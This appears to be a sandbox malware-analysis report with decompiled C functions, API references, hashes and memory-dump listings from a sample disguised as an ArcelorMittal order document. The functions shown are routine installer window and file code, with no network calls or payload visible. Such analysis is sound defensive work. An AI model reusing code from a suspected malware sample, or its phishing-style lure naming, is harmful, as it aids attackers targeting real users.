                                                • Instruction ID: 919d528a87020fadcf7da11d7c25636ac447c6c10cfa6ed71665d8ccb2c3e407
                                                • Opcode Fuzzy Hash: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
                                                • Instruction Fuzzy Hash: 4DD05E73B04100DBCB50DFE8AE08A9D77B5AB80338B24C177E601F25E4DAB8C6509B1E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404142 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404142(int _a4) {
				struct HWND__* _t2;
				long _t3;

				_t2 =  *0x7a7a18; // 0x103ae
				if(_t2 != 0) {
					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
					return _t3;
				}
				return _t2;
			}





                                                0x00404142
                                                0x00404149
                                                0x00404154
                                                0x00000000
                                                0x00404154
                                                0x0040415a

                                                APIs
                                                • SendMessageW.USER32(000103AE,00000000,00000000,00000000), ref: 00404154
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                • Instruction ID: cc05bc227ed13b811f407cb85d7c2569ddbf91d4c39e4ff41bb473b50526893a
                                                • Opcode Fuzzy Hash: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                • Instruction Fuzzy Hash: ABC09B71744700BBEA10DF649D49F1777547BA4751F14C8297351F51D0C674D450D71C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040412B Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040412B(int _a4) {
				long _t2;

				_t2 = SendMessageW( *0x7a8a48, 0x28, _a4, 1); // executed
				return _t2;
			}




                                                0x00404139
                                                0x0040413f

                                                APIs
                                                • SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                • Instruction ID: d373e4bc0d40e7382ef1e11b314aa0fa38d31fe2e2f9466a5520a1a67522e00c
                                                • Opcode Fuzzy Hash: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                • Instruction Fuzzy Hash: AFB01235180A00BBDE514B00FE09F457E62F7AC701F00C429B340240F0CEB200B0DB09
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403235 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00403235(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}




                                                0x00403243
                                                0x00403249

                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403517,?), ref: 00403243
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404118 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00404118(int _a4) {
				int _t2;

				_t2 = EnableWindow( *0x7a1f3c, _a4); // executed
				return _t2;
			}




                                                0x00404122
                                                0x00404128

                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403EF0), ref: 00404122
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                • Instruction ID: 444c84cbde4606a42b11029cb4d9c6b68aea771a74e0ff2f6fd8e0518f780766
                                                • Opcode Fuzzy Hash: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                • Instruction Fuzzy Hash: ACA0113A000000AFCF028B80EF08C0ABB22ABE0300B20C03AA280800308B320820FB08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E004014D7() {
				long _t2;
				void* _t6;
				void* _t10;

				_t2 = E00402BA2(_t6);
				if(_t2 <= 1) {
					_t2 = 1;
				}
				Sleep(_t2); // executed
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t10 - 4));
				return 0;
			}






                                                0x004014d8
                                                0x004014e0
                                                0x004014e4
                                                0x004014e4
                                                0x004014e6
                                                0x00402a4f
                                                0x00402a5b

                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.507894920.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.507868246.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507911689.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.507921595.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.508509950.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510451395.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510515458.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.510600550.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511648274.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511823471.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.511900992.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512075724.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512212144.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512264477.00000000007D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.512275856.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                • Instruction ID: 9fddfdb3ce08ea3f3c8fe9d319431df7e4e0be4ecd303254129af624b9b4f796
                                                • Opcode Fuzzy Hash: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                • Instruction Fuzzy Hash: CBD0C977B141009BD790EFB9AE8986A73A8EB913293248837D902E11A2D97CC811462D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 1000121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E1000121B() {
				void* _t3;

				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
				return _t3;
			}




                                                0x10001225
                                                0x1000122b

                                                APIs
                                                • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.514496286.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.514490574.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514501973.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000000.00000002.514506940.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                Similarity
                                                • API ID: AllocGlobal
                                                • String ID:
                                                • API String ID: 3761449716-0
                                                • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 00404B0D Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E00404B0D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed char* _v28;
				long _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				signed char* _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				intOrPtr _t195;
				intOrPtr _t197;
				long _t201;
				signed int _t205;
				signed int _t216;
				void* _t219;
				void* _t220;
				int _t226;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t239;
				signed int _t241;
				signed char _t242;
				signed char _t248;
				void* _t252;
				void* _t254;
				signed char* _t270;
				signed char _t271;
				long _t276;
				int _t282;
				signed int _t283;
				long _t284;
				signed int _t287;
				signed int _t294;
				signed char* _t302;
				struct HWND__* _t306;
				int _t307;
				signed int* _t308;
				int _t309;
				long _t310;
				signed int _t311;
				void* _t313;
				long _t314;
				int _t315;
				signed int _t316;
				void* _t318;

				_t306 = _a4;
				_v12 = GetDlgItem(_t306, 0x3f9);
				_v8 = GetDlgItem(_t306, 0x408);
				_t318 = SendMessageW;
				_v20 =  *0x7a8a68;
				_t282 = 0;
				_v24 =  *0x7a8a50 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t285 = _a16;
					} else {
						_a12 = _t282;
						_t285 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t285;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
							if(( *0x7a8a59 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t282) {
									_t231 = _v16;
									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
									}
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
										_t285 = _v20;
										_t233 =  *(_t232 + 0x5c);
										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
										} else {
											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t285 = 0 | _a8 != 0x00000413;
								_t239 = E00404A5B(_v8, _a8 != 0x413);
								_t311 = _t239;
								if(_t311 >= _t282) {
									_t88 = _v20 + 8; // 0x8
									_t285 = _t239 * 0x818 + _t88;
									_t241 =  *_t285;
									if((_t241 & 0x00000010) == 0) {
										if((_t241 & 0x00000040) == 0) {
											_t242 = _t241 ^ 0x00000001;
										} else {
											_t248 = _t241 ^ 0x00000080;
											if(_t248 >= 0) {
												_t242 = _t248 & 0x000000fe;
											} else {
												_t242 = _t248 | 0x00000001;
											}
										}
										 *_t285 = _t242;
										E0040117D(_t311);
										_a12 = _t311 + 1;
										_a16 =  !( *0x7a8a58) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t285 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, _t282, _t282);
							}
							if(_a8 == 0x40b) {
								_t219 =  *0x7a1f24;
								if(_t219 != _t282) {
									ImageList_Destroy(_t219);
								}
								_t220 =  *0x7a1f38;
								if(_t220 != _t282) {
									GlobalFree(_t220);
								}
								 *0x7a1f24 = _t282;
								 *0x7a1f38 = _t282;
								 *0x7a8aa0 = _t282;
							}
							if(_a8 != 0x40f) {
								L88:
								if(_a8 == 0x420 && ( *0x7a8a59 & 0x00000001) != 0) {
									_t307 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t307);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
								}
								goto L91;
							} else {
								E004011EF(_t285, _t282, _t282);
								_t192 = _a12;
								if(_t192 != _t282) {
									if(_t192 != 0xffffffff) {
										_t192 = _t192 - 1;
									}
									_push(_t192);
									_push(8);
									E00404ADB();
								}
								if(_a16 == _t282) {
									L75:
									E004011EF(_t285, _t282, _t282);
									_v32 =  *0x7a1f38;
									_t195 =  *0x7a8a68;
									_v60 = 0xf030;
									_v20 = _t282;
									if( *0x7a8a6c <= _t282) {
										L86:
										InvalidateRect(_v8, _t282, 1);
										_t197 =  *0x7a7a1c; // 0x8681a6
										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
											E00404A16(0x3ff, 0xfffffffb, E00404A2E(5));
										}
										goto L88;
									}
									_t308 = _t195 + 8;
									do {
										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
										if(_t201 != _t282) {
											_t287 =  *_t308;
											_v68 = _t201;
											_v72 = 8;
											if((_t287 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t308[4]);
												_t308[0] = _t308[0] & 0x000000fe;
											}
											if((_t287 & 0x00000040) == 0) {
												_t205 = (_t287 & 0x00000001) + 1;
												if((_t287 & 0x00000010) != 0) {
													_t205 = _t205 + 3;
												}
											} else {
												_t205 = 3;
											}
											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageW(_v8, 0x113f, _t282,  &_v72);
										}
										_v20 = _v20 + 1;
										_t308 =  &(_t308[0x206]);
									} while (_v20 <  *0x7a8a6c);
									goto L86;
								} else {
									_t309 = E004012E2( *0x7a1f38);
									E00401299(_t309);
									_t216 = 0;
									_t285 = 0;
									if(_t309 <= _t282) {
										L74:
										SendMessageW(_v12, 0x14e, _t285, _t282);
										_a16 = _t309;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
											_t285 = _t285 + 1;
										}
										_t216 = _t216 + 1;
									} while (_t216 < _t309);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L91;
						} else {
							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
							if(_t226 == 0xffffffff) {
								goto L91;
							}
							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
								_t310 = 0x20;
							}
							E00401299(_t310);
							SendMessageW(_a4, 0x420, _t282, _t310);
							_a12 = _a12 | 0xffffffff;
							_a16 = _t282;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v32 = 0;
					_v16 = 2;
					 *0x7a8aa0 = _t306;
					 *0x7a1f38 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
					_t252 = LoadBitmapW( *0x7a8a40, 0x6e);
					 *0x7a1f2c =  *0x7a1f2c | 0xffffffff;
					_t313 = _t252;
					 *0x7a1f34 = SetWindowLongW(_v8, 0xfffffffc, E00405105);
					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f24 = _t254;
					ImageList_AddMasked(_t254, _t313, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f24);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t313);
					_t314 = 0;
					do {
						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
							if(_t314 != 0x20) {
								_v16 = _t282;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406054(_t282, _t314, _t318, _t282, _t260)), _t314);
						}
						_t314 = _t314 + 1;
					} while (_t314 < 0x21);
					_t315 = _a16;
					_t283 = _v16;
					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
					_push(0x15);
					E004040F6(_a4);
					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
					_push(0x16);
					E004040F6(_a4);
					_t316 = 0;
					_t284 = 0;
					if( *0x7a8a6c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t302 = _v20 + 8;
						_v28 = _t302;
						do {
							_t270 =  &(_t302[0x10]);
							if( *_t270 != 0) {
								_v60 = _t270;
								_t271 =  *_t302;
								_t294 = 0x20;
								_v84 = _t284;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t294;
								_v40 = _t316;
								_v68 = _t271 & _t294;
								if((_t271 & 0x00000002) == 0) {
									if((_t271 & 0x00000004) == 0) {
										 *( *0x7a1f38 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
									} else {
										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
									_v32 = 1;
									 *( *0x7a1f38 + _t316 * 4) = _t276;
									_t284 =  *( *0x7a1f38 + _t316 * 4);
								}
							}
							_t316 = _t316 + 1;
							_t302 =  &(_v28[0x818]);
							_v28 = _t302;
						} while (_t316 <  *0x7a8a6c);
						if(_v32 != 0) {
							L20:
							if(_v16 != 0) {
								E0040412B(_v8);
								_t282 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E0040412B(_v12);
								L91:
								return E0040415D(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}





























































                                                0x00404b1c
                                                0x00404b2d
                                                0x00404b32
                                                0x00404b3a
                                                0x00404b40
                                                0x00404b48
                                                0x00404b56
                                                0x00404b59
                                                0x00404d7a
                                                0x00404d81
                                                0x00404d95
                                                0x00404d83
                                                0x00404d85
                                                0x00404d88
                                                0x00404d89
                                                0x00404d90
                                                0x00404d90
                                                0x00404da1
                                                0x00404daf
                                                0x00404db2
                                                0x00404dc8
                                                0x00404e3d
                                                0x00404e40
                                                0x00404e42
                                                0x00404e4c
                                                0x00404e5a
                                                0x00404e5a
                                                0x00404e5c
                                                0x00404e66
                                                0x00404e6c
                                                0x00404e6f
                                                0x00404e72
                                                0x00404e8d
                                                0x00404e74
                                                0x00404e7e
                                                0x00404e7e
                                                0x00404e72
                                                0x00404e66
                                                0x00000000
                                                0x00404e40
                                                0x00404dcd
                                                0x00404dd8
                                                0x00404ddd
                                                0x00404de4
                                                0x00404de9
                                                0x00404ded
                                                0x00404df8
                                                0x00404df8
                                                0x00404dfc
                                                0x00404e00
                                                0x00404e04
                                                0x00404e17
                                                0x00404e06
                                                0x00404e06
                                                0x00404e0d
                                                0x00404e13
                                                0x00404e0f
                                                0x00404e0f
                                                0x00404e0f
                                                0x00404e0d
                                                0x00404e1b
                                                0x00404e1d
                                                0x00404e30
                                                0x00404e33
                                                0x00404e36
                                                0x00404e36
                                                0x00404e00
                                                0x00000000
                                                0x00404ded
                                                0x00404dcf
                                                0x00404dd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404e90
                                                0x00404e90
                                                0x00404e97
                                                0x00404f08
                                                0x00404f10
                                                0x00404f18
                                                0x00404f18
                                                0x00404f21
                                                0x00404f23
                                                0x00404f2a
                                                0x00404f2d
                                                0x00404f2d
                                                0x00404f33
                                                0x00404f3a
                                                0x00404f3d
                                                0x00404f3d
                                                0x00404f43
                                                0x00404f49
                                                0x00404f4f
                                                0x00404f4f
                                                0x00404f5c
                                                0x004050b2
                                                0x004050b9
                                                0x004050d6
                                                0x004050dc
                                                0x004050ee
                                                0x004050ee
                                                0x00000000
                                                0x00404f62
                                                0x00404f64
                                                0x00404f69
                                                0x00404f6e
                                                0x00404f73
                                                0x00404f75
                                                0x00404f75
                                                0x00404f76
                                                0x00404f77
                                                0x00404f79
                                                0x00404f79
                                                0x00404f81
                                                0x00404fc2
                                                0x00404fc4
                                                0x00404fd4
                                                0x00404fd7
                                                0x00404fdc
                                                0x00404fe3
                                                0x00404fe6
                                                0x00405088
                                                0x0040508e
                                                0x00405094
                                                0x0040509c
                                                0x004050ad
                                                0x004050ad
                                                0x00000000
                                                0x0040509c
                                                0x00404fec
                                                0x00404fef
                                                0x00404ff5
                                                0x00404ffa
                                                0x00404ffc
                                                0x00404ffe
                                                0x00405004
                                                0x0040500b
                                                0x00405010
                                                0x00405017
                                                0x0040501a
                                                0x0040501a
                                                0x00405021
                                                0x0040502d
                                                0x00405031
                                                0x00405033
